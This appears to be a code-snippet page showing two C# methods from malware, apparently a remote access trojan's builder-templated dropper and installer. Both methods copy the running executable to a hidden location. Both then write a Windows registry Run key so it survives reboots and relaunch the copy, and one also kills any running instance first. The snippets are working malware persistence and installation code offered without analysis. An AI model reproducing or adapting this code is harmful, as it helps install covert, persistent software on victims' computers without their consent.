Beispiel #1
0
 private static void InstallPayload()
 {
     try
     {
         string DownloaderFullPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.% DIR %), "%EXE%");
         if (Process.GetCurrentProcess().MainModule.FileName == DownloaderFullPath)
         {
             return;
         }
         FileStream Drop = null;
         if (File.Exists(DownloaderFullPath))
         {
             Drop = new FileStream(DownloaderFullPath, FileMode.Create);
         }
         else
         {
             Drop = new FileStream(DownloaderFullPath, FileMode.CreateNew);
         }
         byte[] Payload = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
         Drop.Write(Payload, 0, Payload.Length);
         Drop.Dispose();
         Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(DownloaderFullPath), DownloaderFullPath);
         Process.Start(DownloaderFullPath);
         Thread.Sleep(50);
         Environment.Exit(0);
     }
     catch (Exception ex)
     {
     }
 }
        public static void Install()
        {
            try
            {
                if (Process.GetCurrentProcess().MainModule.FileName != Settings.ClientFullPath)
                {
                    foreach (Process P in Process.GetProcesses())
                    {
                        try
                        {
                            if (P.MainModule.FileName == Settings.ClientFullPath)
                            {
                                P.Kill();
                            }
                        }
                        catch
                        {
                            Debug.WriteLine("NormalStartup Error : " + P.ProcessName);
                        }
                    }

                    FileStream Drop;
                    if (File.Exists(Settings.ClientFullPath))
                    {
                        Drop = new FileStream(Settings.ClientFullPath, FileMode.Create);
                    }
                    else
                    {
                        Drop = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
                    }
                    byte[] Client = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
                    Drop.Write(Client, 0, Client.Length);
                    Drop.Dispose();

                    Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
                    Methods.CloseMutex();
                    Process.Start(Settings.ClientFullPath);
                    Environment.Exit(0);
                }
            }
            catch (Exception ex)
            {
                Debug.WriteLine("Install Failed : " + ex.Message);
            }
        }